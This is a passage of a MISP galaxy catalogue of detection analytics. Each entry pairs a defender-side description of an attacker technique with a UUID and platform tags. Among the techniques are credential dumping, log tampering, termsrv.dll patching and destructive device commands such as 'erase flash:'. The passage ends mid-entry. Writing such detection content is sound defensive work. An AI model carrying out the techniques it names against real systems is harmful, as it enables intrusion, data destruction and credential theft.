UUID f403ae40-31ff-4550-b21f-e1c24315276d which can be used as unique global reference for Analytic 0755 - AN0755 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0755
mitre_platforms ['Windows']

Analytic 0855 - AN0855

Defender observes configuration changes on firewall/network appliance involving rule creation, modification, or deletion from abnormal management IPs or non-console channels (e.g., remote CLI, API). These are often correlated with a spike in previously blocked outbound traffic, unexpected allow-all rules, or bulk rule deletions. Behavior often follows unauthorized login, privilege escalation, or API abuse.

Internal MISP references

UUID 17ce541a-23fa-4b33-affc-c6ba906e9956 which can be used as unique global reference for Analytic 0855 - AN0855 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0855
mitre_platforms ['Network Devices']

Analytic 0558 - AN0558

Execution of control.exe or rundll32.exe with parameters pointing to CPL files, especially from non-standard directories or newly created files, followed by suspicious child process execution or registry modifications registering new Control Panel items.

Internal MISP references

UUID 8581bca4-9d34-4c78-87f7-29244581d140 which can be used as unique global reference for Analytic 0558 - AN0558 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0558
mitre_platforms ['Windows']

Analytic 0585 - AN0585

Malicious script or binary causes repeated kernel panics, OOM kills, or systemd service restarts targeting services like nginx, httpd, sshd.

Internal MISP references

UUID b7e4a6de-8ff3-4711-aa83-97533adec211 which can be used as unique global reference for Analytic 0585 - AN0585 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0585
mitre_platforms ['Linux']

Analytic 0595 - AN0595

Adversary modifies or replaces the Terminal Services DLL (termsrv.dll) or changes the associated ServiceDll Registry value to load an arbitrary or patched DLL that enables persistent and enhanced RDP access. This may include binary replacement, registry tampering, and unexpected module loads by the svchost.exe -k termsvcs process.

Internal MISP references

UUID 01f18cc1-2948-4ea7-adaf-017da939b9ff which can be used as unique global reference for Analytic 0595 - AN0595 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0595
mitre_platforms ['Windows']

Analytic 0559 - AN0559

Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration.

Internal MISP references

UUID edfec58e-e591-4057-a906-1baf3674d80b which can be used as unique global reference for Analytic 0559 - AN0559 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0559
mitre_platforms ['Windows']

Analytic 0955 - AN0955

Access tokens or SSH keys used without corresponding login shell or PAM module activity, particularly for remote execution.

Internal MISP references

UUID fbe17895-73cc-432e-8576-f6cab851feb1 which can be used as unique global reference for Analytic 0955 - AN0955 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0955
mitre_platforms ['Linux']

Analytic 0656 - AN0656

Phishing attachments executed on Linux systems are detected by linking email logs to file creation in mail directories and subsequent suspicious process execution. Look for unexpected binaries or scripts spawned from user mail directories and anomalous outbound network activity.

Internal MISP references

UUID 02309791-384c-4ca9-b25c-6a6bc754795f which can be used as unique global reference for Analytic 0656 - AN0656 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0656
mitre_platforms ['Linux']

Analytic 0665 - AN0665

Adversary defaces internal VM-hosted portals or web UIs by modifying static content on datastore-mounted paths.

Internal MISP references

UUID 0e7e1861-14be-4862-8cba-6344e6e196f2 which can be used as unique global reference for Analytic 0665 - AN0665 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0665
mitre_platforms ['ESXi']

Analytic 0566 - AN0566

Unsigned or user-space apps initiate TLS connections with one hostname and HTTP headers requesting a different domain, commonly abused in CDN-resident domain fronting techniques.

Internal MISP references

UUID b4cf91ba-a22b-49b4-978e-32c3e1301c74 which can be used as unique global reference for Analytic 0566 - AN0566 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0566
mitre_platforms ['macOS']

Analytic 0765 - AN0765

Correlates creation/modification of systemd service files or /etc/init.d scripts with outlier process behavior during boot

Internal MISP references

UUID 156387d6-9b9a-49f8-834a-cf3cd5ede09c which can be used as unique global reference for Analytic 0765 - AN0765 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0765
mitre_platforms ['Linux']

Analytic 0567 - AN0567

Traffic originating from ESXi hosts or management interfaces displays SNI-to-Host mismatch behavior, particularly anomalous given typical infrastructure communication patterns.

Internal MISP references

UUID 4192b311-da7a-4ef1-b09a-a03a8c2a1670 which can be used as unique global reference for Analytic 0567 - AN0567 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0567
mitre_platforms ['ESXi']

Analytic 0756 - AN0756

Adversary modifies tenant policy through changes to federation configuration, trust settings, or identity provider additions in Microsoft 365/AzureAD via Portal, PowerShell, or Graph API. Includes setting authentication to federated or updating federated domains.

Internal MISP references

UUID 65a1926d-e504-4153-b19f-555e8a06e5a5 which can be used as unique global reference for Analytic 0756 - AN0756 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0756
mitre_platforms ['Identity Provider']

Analytic 0657 - AN0657

Phishing attachment detection on macOS through correlation of Mail app logs, file creation in user directories, and abnormal process execution (e.g., Preview.app or Mail.app spawning Terminal or scripting binaries). Network traffic after attachment interaction is also monitored.

Internal MISP references

UUID 7a6192b4-997a-4526-bb3d-76664bc31274 which can be used as unique global reference for Analytic 0657 - AN0657 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0657
mitre_platforms ['macOS']

Analytic 0675 - AN0675

Detects forged Kerberos Silver Tickets by identifying anomalous Kerberos service ticket activity such as malformed fields in logon events, TGS requests without interaction with the KDC, and access attempts using service accounts outside expected hosts/resources. Also monitors suspicious processes accessing LSASS memory for credential dumping.

Internal MISP references

UUID 88ece783-08bc-41e6-a000-a63f540768cc which can be used as unique global reference for Analytic 0675 - AN0675 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0675
mitre_platforms ['Windows']

Analytic 0576 - AN0576

Cause→effect chain: (1) A user or service launches an indirection utility (e.g., forfiles.exe, pcalua.exe, wsl.exe, scriptrunner.exe, ssh.exe with -o ProxyCommand/LocalCommand). (2) That utility spawns a secondary program/command (PowerShell, cmd, msiexec, regsvr32, curl, arbitrary EXE) and/or opens outbound network connections. (3) Optional precursor modification of SSH config to persist LocalCommand/ProxyCommand. Correlate process creation, command/script content, file access to %USERPROFILE%.ssh\config, and network connections from the utility or its child.

Internal MISP references

UUID 9f3aea30-e100-432a-8aa0-959bd7f4e069 which can be used as unique global reference for Analytic 0576 - AN0576 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0576
mitre_platforms ['Windows']

Analytic 0856 - AN0856

Correlated file access to insecure credential files (e.g., .env, .xml, *.ps1) followed by suspicious process execution or authentication using retrieved credentials. Detected through Sysmon logs and Windows Security Event logs.

Internal MISP references

UUID 0277e29a-af6d-4242-a187-32673328664a which can be used as unique global reference for Analytic 0856 - AN0856 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0856
mitre_platforms ['Windows']

Analytic 0568 - AN0568

A non-standard process (or script-hosted process) loads camera/video-capture libraries (e.g., avicap32.dll, mf.dll, ksproxy.ax), opens the Camera Frame Server/device, writes video/image artifacts (e.g., .mp4/.avi/.yuv) to unusual locations, and optionally initiates outbound transfer shortly after.

Internal MISP references

UUID 171803bb-8aa7-42df-861a-18d6d694f909 which can be used as unique global reference for Analytic 0568 - AN0568 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0568
mitre_platforms ['Windows']

Analytic 0865 - AN0865

Detects unauthorized additions of users or machine accounts to privileged local or domain groups (e.g., Administrators, Remote Desktop Users).

Internal MISP references

UUID 58bed5f5-6ef5-4558-9ac9-b58f8aa9888c which can be used as unique global reference for Analytic 0865 - AN0865 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0865
mitre_platforms ['Windows']

Analytic 0586 - AN0586

Adversary launches high-entropy process or malformed app bundle causing repeated application crashes and system slowdowns.

Internal MISP references

UUID 5f2cc434-5edc-4f36-927a-eb48ee72aa6e which can be used as unique global reference for Analytic 0586 - AN0586 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0586
mitre_platforms ['macOS']

Analytic 0685 - AN0685

Monitor Facetime, iMessage, or SIP client logs for anomalous voice call attempts. Link to subsequent user execution events (downloads, RMM installs) triggered post-call.

Internal MISP references

UUID 756214e0-660d-4f32-a4f1-f8ff24a7852f which can be used as unique global reference for Analytic 0685 - AN0685 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0685
mitre_platforms ['macOS']

Analytic 0658 - AN0658

Detection of modified or newly created /etc/rc.local or /etc/init.d scripts followed by suspicious execution during system startup.

Internal MISP references

UUID 98f8728d-ff74-47cb-b884-25071a21f77e which can be used as unique global reference for Analytic 0658 - AN0658 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0658
mitre_platforms ['Linux']

Analytic 0596 - AN0596

Adversary uses a process to establish outbound connections that transmit uniform packet sizes at a consistent interval, avoiding threshold-based network alerts.

Internal MISP references

UUID 1e9fdc71-d073-403a-9ee9-bab091318454 which can be used as unique global reference for Analytic 0596 - AN0596 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0596
mitre_platforms ['Windows']

Analytic 0956 - AN0956

Token replay or impersonation in federated logins without interactive browser session or MFA prompts.

Internal MISP references

UUID 367cfbd9-fcfd-4336-863e-b6917ff71cb4 which can be used as unique global reference for Analytic 0956 - AN0956 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0956
mitre_platforms ['Identity Provider']

Analytic 0965 - AN0965

Detection of clipboard access via OS utilities (e.g., clip.exe, Get-Clipboard) by non-interactive or abnormal parent processes, potentially chained with staging or exfiltration commands.

Internal MISP references

UUID 48e4aceb-38dd-4bf2-8074-9fee8436985b which can be used as unique global reference for Analytic 0965 - AN0965 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0965
mitre_platforms ['Windows']

Analytic 0659 - AN0659

Detection of edits or additions to /etc/rc.common, /Library/StartupItems, or /System/Library/StartupItems and associated script execution during login or reboot.

Internal MISP references

UUID e716b209-5b06-4bc4-843f-cbe4c51ddc0d which can be used as unique global reference for Analytic 0659 - AN0659 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0659
mitre_platforms ['macOS']

Analytic 0695 - AN0695

Detects adversarial use of cloud-native APIs (e.g., AWS IAM, Azure RBAC, GCP Identity) to enumerate cloud group memberships or policy mappings via unauthorized sessions or scripts.

Internal MISP references

UUID ef4f995e-6f20-42b7-802e-555ac54ab7b9 which can be used as unique global reference for Analytic 0695 - AN0695 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0695
mitre_platforms ['IaaS']

Analytic 0569 - AN0569

A process opens/reads /dev/video* (V4L2), performs ioctl/read loops, writes large/continuous video artifacts to disk, and/or quickly establishes outbound connections for exfiltration.

Internal MISP references

UUID f3c5c71a-da1b-4d09-bda7-ec07b0b7c05d which can be used as unique global reference for Analytic 0569 - AN0569 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0569
mitre_platforms ['Linux']

Analytic 0775 - AN0775

Detection of writes to /boot or EFI directories outside of expected package manager updates. Monitoring kernel log and auditd events for attempts to overwrite bootloader binaries (e.g., grub, shim). Unexpected execution of efibootmgr or dd writing to /dev/sdX devices followed by boot parameter changes.

Internal MISP references

UUID 08dd2c3b-e07c-4b47-bae6-aa09c2a86d87 which can be used as unique global reference for Analytic 0775 - AN0775 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0775
mitre_platforms ['Linux']

Analytic 0757 - AN0757

Detects anomalous process access to LSASS on domain controllers, suspicious module loads of authentication DLLs, and registry or file modifications indicative of Skeleton Key–style patching. Correlates LSASS access attempts with subsequent abnormal logon activity patterns.

Internal MISP references

UUID 40882c73-344f-4138-894e-049b9bb1f460 which can be used as unique global reference for Analytic 0757 - AN0757 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0757
mitre_platforms ['Windows']

Analytic 0577 - AN0577

DLL hijacking behaviors including unexpected DLL loads from non-standard directories, replacement of DLLs, phantom DLL insertion, redirection file creation, and substitution of legitimate DLLs. Defender correlates file system modifications, registry changes, and module load telemetry to detect abnormal DLL behavior in trusted processes.

Internal MISP references

UUID 448ecbfb-2b38-4ecc-9c63-f7dd87339271 which can be used as unique global reference for Analytic 0577 - AN0577 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0577
mitre_platforms ['Windows']

Analytic 0758 - AN0758

Detects unauthorized modification of network device authentication by correlating OS image file changes, checksum mismatches, or memory verification failures with anomalous authentication events. Focus is on behaviors where patched images introduce hardcoded passwords or bypass native authentication.

Internal MISP references

UUID 2f39584b-59bd-43ec-bd0a-5c2eba258ae2 which can be used as unique global reference for Analytic 0758 - AN0758 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0758
mitre_platforms ['Network Devices']

Analytic 0587 - AN0587

Instance enters degraded/unhealthy state due to abnormal process load or memory exhaustion, often caused by automation or script-based attacks.

Internal MISP references

UUID 472f81b1-99ba-406a-b2ef-d70b2af5b527 which can be used as unique global reference for Analytic 0587 - AN0587 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0587
mitre_platforms ['IaaS']

Analytic 0785 - AN0785

Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.

Internal MISP references

UUID 50658b7e-57c5-4e31-b156-1b294574a9f2 which can be used as unique global reference for Analytic 0785 - AN0785 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0785
mitre_platforms ['Windows']

Analytic 0578 - AN0578

Detects interactive or scripted abuse of cmd.exe, batch files, or shell invocation chains. Focuses on parent-child relationships (e.g., cmd.exe launched from unusual parents), anomalous command-line parameters, and chaining with discovery, credential access, or lateral movement behaviors.

Internal MISP references

UUID 60d70569-0d28-4d98-957c-4676b2411685 which can be used as unique global reference for Analytic 0578 - AN0578 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0578
mitre_platforms ['Windows']

Analytic 0857 - AN0857

File reads or process executions involving insecurely stored credential files (e.g., config files with password fields) by non-root or anomalous users followed by ssh authentication attempts.

Internal MISP references

UUID 7ff5d08a-5d4d-4260-85ee-fdb6a244f258 which can be used as unique global reference for Analytic 0857 - AN0857 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0857
mitre_platforms ['Linux']

Analytic 0875 - AN0875

Detects suspicious execution of network monitoring tools (e.g., Wireshark, tshark, Microsoft Message Analyzer), driver loading indicative of promiscuous mode, or non-admin user privilege escalation to access NICs for capture.

Internal MISP references

UUID b3579b0f-7daf-40bd-af1c-f5cd020942e6 which can be used as unique global reference for Analytic 0875 - AN0875 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0875
mitre_platforms ['Windows']

Analytic 0975 - AN0975

Correlate registry modifications (e.g., UAC bypass registry keys), unusual parent-child process relationships (e.g., control.exe spawning cmd.exe), and unsigned elevated process executions with non-standard tokens or elevation flags.

Internal MISP references

UUID 11f18771-dd49-45f7-8ef5-05d3426d82d5 which can be used as unique global reference for Analytic 0975 - AN0975 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0975
mitre_platforms ['Windows']

Analytic 0795 - AN0795

Monitor SaaS mail platforms (Google Workspace, M365, Okta-integrated apps) for SendAs/SendOnBehalfOf operations where the delegated permissions are unusual or newly granted. Detect impersonation attempts where adversaries configure rules to auto-forward or auto-reply with impersonated content.

Internal MISP references

UUID 2266c86a-a47e-46ac-aa6d-c1eb6d49a1e5 which can be used as unique global reference for Analytic 0795 - AN0795 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0795
mitre_platforms ['SaaS']

Analytic 0597 - AN0597

Outbound connections from non-network-facing processes repeatedly send similarly sized payloads within uniform time intervals.

Internal MISP references

UUID 4baad14d-46b1-4e96-9e2a-138ae4e3ec75 which can be used as unique global reference for Analytic 0597 - AN0597 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0597
mitre_platforms ['Linux']

Analytic 0957 - AN0957

Unusual reuse of OAuth access tokens from different geographic regions, without full login events.

Internal MISP references

UUID 7fb5fe4f-ecd1-45a1-8a0f-dc913587e650 which can be used as unique global reference for Analytic 0957 - AN0957 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0957
mitre_platforms ['SaaS']

Analytic 0759 - AN0759

Processes that normally do not initiate network connections establishing outbound encrypted TLS/SSL sessions, especially with asymmetric traffic volumes (client sending more than receiving) or non-standard certificate chains. Defender observations correlate process creation with unexpected network encryption libraries being loaded.

Internal MISP references

UUID 81233639-a08b-4a56-a5d4-ac2f9ae94a2b which can be used as unique global reference for Analytic 0759 - AN0759 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0759
mitre_platforms ['Windows']

Analytic 0579 - AN0579

Detects ptrace-based process injection by correlating audit logs of ptrace syscalls, memory modifications (e.g., poketext, pokedata), and suspicious register manipulation on a target process not normally debugged by the originator. Alerts on processes attempting to ptrace non-child or privileged processes, especially those followed by abnormal memory or execution behavior.

Internal MISP references

UUID d9bcfaee-d2d1-4673-b834-5c219f8dba9b which can be used as unique global reference for Analytic 0579 - AN0579 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0579
mitre_platforms ['Linux']

Analytic 0588 - AN0588

Container orchestrator logs show crashlooping pods, repeated resource exhaustion, or malicious binaries with infinite loops consuming systemd/cgroup limits.

Internal MISP references

UUID 7027622a-7a33-4189-a500-c54eef3467b6 which can be used as unique global reference for Analytic 0588 - AN0588 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0588
mitre_platforms ['Containers']

Analytic 0885 - AN0885

Execution of CLI commands erasing file systems or storage (erase flash:, format disk, erase nvram:). Detect authentication events followed by destructive commands within the same privileged session.

Internal MISP references

UUID d0e64036-83fb-4ff7-b81b-9b67b6c6b9dc which can be used as unique global reference for Analytic 0885 - AN0885 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0885
mitre_platforms ['Network Devices']

Analytic 0858 - AN0858

Terminal-based grep or open of plist/config files containing credentials, correlated with Keychain or system login attempts.

Internal MISP references

UUID df289d0f-0f31-487e-b213-9a492d903f2c which can be used as unique global reference for Analytic 0858 - AN0858 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0858
mitre_platforms ['macOS']

Analytic 0958 - AN0958

Container process uses mounted cloud credentials or token cache to authenticate without known orchestration.

Internal MISP references

UUID 2127b359-24b0-40e2-a202-67e53d5be3b0 which can be used as unique global reference for Analytic 0958 - AN0958 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0958
mitre_platforms ['Containers']

Analytic 0985 - AN0985

Detects binaries or launch daemons in /System/Library or /Applications with mismatched bundle names, unexpected metadata, or improper installation origin.

Internal MISP references

UUID 466a2102-fcb3-4372-9a8d-ad8fe34e94ec which can be used as unique global reference for Analytic 0985 - AN0985 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0985
mitre_platforms ['macOS']

Analytic 0895 - AN0895

Processes such as PowerShell, Git, or curl initiating outbound HTTPS POST requests to known code repository APIs (e.g., github.com, gitlab.com) immediately following large file reads. Defender view: correlation between file access of sensitive directories (e.g., Documents, Finance) and abnormal data uploads to repository domains.

Internal MISP references

UUID 7c7f0049-96af-4acc-9c58-9f8e661adb63 which can be used as unique global reference for Analytic 0895 - AN0895 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0895
mitre_platforms ['Windows']

Analytic 0589 - AN0589

Registry read access associated with suspicious or non-interactive processes querying system config, installed software, or security settings.

Internal MISP references

UUID 8986f2ab-2e6d-4c68-99ac-6a1c5f29fb7b which can be used as unique global reference for Analytic 0589 - AN0589 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0589
mitre_platforms ['Windows']

Analytic 0859 - AN0859

Container processes accessing mounted secrets or configuration paths (e.g., /run/secrets, /mnt/config) followed by network access or credential use.

Internal MISP references

UUID 9c5d279c-eb09-4592-91a4-8cf6436522b6 which can be used as unique global reference for Analytic 0859 - AN0859 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0859
mitre_platforms ['Containers']

Analytic 0598 - AN0598

Processes on macOS initiate external connections that consistently transmit data in fixed sizes using LaunchAgents or unexpected users.

Internal MISP references

UUID d0edef63-9a98-4435-9f4b-2c577c7de41d which can be used as unique global reference for Analytic 0598 - AN0598 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0598
mitre_platforms ['macOS']

Analytic 0959 - AN0959

Access token reuse to connect to SharePoint or Outlook APIs without interactive user context.

Internal MISP references

UUID 1313533a-06c7-44ea-8d75-9a23d3ea23cc which can be used as unique global reference for Analytic 0959 - AN0959 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0959
mitre_platforms ['Office Suite']

Analytic 0599 - AN0599

Detection of executables or scripts containing hidden embedded resources or secondary payloads, often with anomalies in file size vs. functionality or dropped child binaries.

Internal MISP references

UUID 8f84fc52-ab74-443b-b618-aa1c0941377a which can be used as unique global reference for Analytic 0599 - AN0599 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0599
mitre_platforms ['Windows']

Analytic 0995 - AN0995

Detection of processes launching downgraded PowerShell versions (e.g., v2) or other legacy binaries that lack logging or security features. Correlates command-line arguments, process metadata, and version fields. Monitors registry changes to Defender or HVCI keys that could indicate intentional downgrades.

Internal MISP references

UUID e61d2099-1517-4bf4-b2e6-6e61cdf94be3 which can be used as unique global reference for Analytic 0995 - AN0995 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0995
mitre_platforms ['Windows']

Analytic 0666 - AN0666

Adversary uses compromised instance credentials or web application access to deface content hosted in S3 buckets, Azure Blob Storage, or GCP Buckets.

Internal MISP references

UUID bd893675-a17e-4c3b-bec4-ffbad6986c73 which can be used as unique global reference for Analytic 0666 - AN0666 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0666
mitre_platforms ['IaaS']

Analytic 0676 - AN0676

Unusual database command-line access (e.g., psql, mysql, mongo) from non-admin users, occurring outside typical automation windows or without known service context. Often followed by data dumps to .sql/.csv files or outbound data transfers. Defender sees CLI tools launched interactively or by unusual parent processes, file writes to dump-like filenames, and external connections shortly after.

Internal MISP references

UUID 147c0305-abff-4bc3-ae2a-acd69d0b87fd which can be used as unique global reference for Analytic 0676 - AN0676 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0676
mitre_platforms ['Linux']

Analytic 0667 - AN0667

Correlates registry modifications to EventLog or WMI Autologger keys, suspicious use of Set-EtwTraceProvider, and Sysmon configuration changes. Defender sees interruption or redirection of ETW and log event collection.

Internal MISP references

UUID 945f8192-6f4f-4183-b457-40b5c6d9b4ca which can be used as unique global reference for Analytic 0667 - AN0667 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0667
mitre_platforms ['Windows']

Analytic 0766 - AN0766

Observes creation or modification of LaunchAgent/LaunchDaemon property list files combined with anomalous plist payload execution after user logon

Internal MISP references

UUID eb0d78b0-f35d-49db-a8a5-d3cf840db6fd which can be used as unique global reference for Analytic 0766 - AN0766 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0766
mitre_platforms ['macOS']

Analytic 0686 - AN0686

Correlate MFA push fatigue or unusual consent grant attempts with call activity where adversaries may have socially engineered the user over voice.

Internal MISP references

UUID 345af006-d658-4f22-aef6-b1cfc0058875 which can be used as unique global reference for Analytic 0686 - AN0686 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0686
mitre_platforms ['Identity Provider']

Analytic 0668 - AN0668

Detects disabling or reconfiguration of syslog or rsyslog services. Monitors sudden stops in logging daemons and suspicious execution of kill or service stop commands targeting syslog processes.

Internal MISP references

UUID 63e17792-17f5-48ae-8002-da6b62b4bcaa which can be used as unique global reference for Analytic 0668 - AN0668 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0668
mitre_platforms ['Linux']

Analytic 0866 - AN0866

Detects unexpected use of usermod, gpasswd, or direct modification of /etc/group to elevate user group membership.

Internal MISP references

UUID ff692121-8bbd-4d22-8192-fe6a7dd94f57 which can be used as unique global reference for Analytic 0866 - AN0866 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0866
mitre_platforms ['Linux']

Analytic 0966 - AN0966

Detection of pbpaste/pbcopy clipboard access by processes without terminal sessions or linked to launch agents, potentially staged for collection.

Internal MISP references

UUID 38252d77-0b46-4e00-8732-3ce1f8491472 which can be used as unique global reference for Analytic 0966 - AN0966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0966
mitre_platforms ['macOS']

Analytic 0669 - AN0669

Detection of tampering with Apple's Unified Logging framework or modification of system log forwarding settings. Defender observes execution of logd-related commands or defaults write to logging preferences.

Internal MISP references

UUID 9274294a-dfc3-4084-b228-dfb36448f077 which can be used as unique global reference for Analytic 0669 - AN0669 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0669
mitre_platforms ['macOS']

Analytic 0696 - AN0696

Identifies unauthorized access or enumeration of administrative roles, security groups, or distribution groups via Exchange/SharePoint/Teams APIs or role discovery scripts.

Internal MISP references

UUID bb94692e-e73c-449c-a17e-0658bebbfd93 which can be used as unique global reference for Analytic 0696 - AN0696 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0696
mitre_platforms ['Office Suite']

Analytic 0776 - AN0776

Abnormal modification of EFI firmware binaries in /System/Library/CoreServices/ or NVRAM parameters not associated with OS updates. Unified logs capturing calls to bless or nvram commands executed from untrusted parent processes. Sudden unsigned kext loads after EFI variable tampering.

Internal MISP references

UUID 43834e1c-533a-4f08-b508-8632d35b10ad which can be used as unique global reference for Analytic 0776 - AN0776 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0776
mitre_platforms ['macOS']

Analytic 0767 - AN0767

An adversary leverages built-in tools such as certutil.exe, powershell.exe, or copy.exe to decode, reassemble, or extract hidden malicious content from obfuscated containers or encoded formats. The decoding utility often spawns shortly after file staging or download and may be chained with script interpreters or further payload execution.

Internal MISP references

UUID 75f05a04-103c-432a-afd6-8a8987b4370e which can be used as unique global reference for Analytic 0767 - AN0767 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0767
mitre_platforms ['Windows']

Analytic 0677 - AN0677

Database client execution (e.g., sqlcmd.exe, isql.exe) by users or from locations not tied to enterprise automation or backups. Often followed by creation of .sql/.bak/.csv files, registry artifacts for ODBC/JDBC drivers, or encrypted ZIPs. Defender sees SQL tools launched by explorer.exe, Powershell, or odd parent processes, plus file writes in user temp locations.

Internal MISP references

UUID d869b672-c3e9-446c-9e7a-c9ce5888794c which can be used as unique global reference for Analytic 0677 - AN0677 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0677
mitre_platforms ['Windows']

Analytic 0876 - AN0876

Correlates interface mode changes to promiscuous with execution of sniffing tools like tcpdump, tshark, or custom pcap libraries. Detects abnormal NIC configurations and unauthorized sniffing from non-root sessions.

Internal MISP references

UUID 01ef3337-0585-4eaa-acb2-df363f7d5463 which can be used as unique global reference for Analytic 0876 - AN0876 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0876
mitre_platforms ['Linux']

Analytic 0867 - AN0867

Detects use of dseditgroup or dscl to add users to privileged macOS groups (e.g., admin).

Internal MISP references

UUID 03b0d93e-955a-49f6-83ad-8cf72b678367 which can be used as unique global reference for Analytic 0867 - AN0867 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0867
mitre_platforms ['macOS']

Analytic 0678 - AN0678

Execution of Java-based or CLI database tools (e.g., DBeaver, Beekeeper, mysql, psql) from user profiles not tied to dev/admin roles, especially when followed by file writes and cloud sync activity. Defender correlates GUI tool launches, file write events in ~/Downloads or ~/Documents, and outbound API calls to known cloud services.

Internal MISP references

UUID 3e87713d-d062-413c-9643-97df331ba651 which can be used as unique global reference for Analytic 0678 - AN0678 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0678
mitre_platforms ['macOS']

Analytic 0687 - AN0687

Behavior chain involving unexpected API calls to capture keyboard input, driver loads for keyloggers, or remote use of smart card authentication via logon sessions not initiated by local user interaction

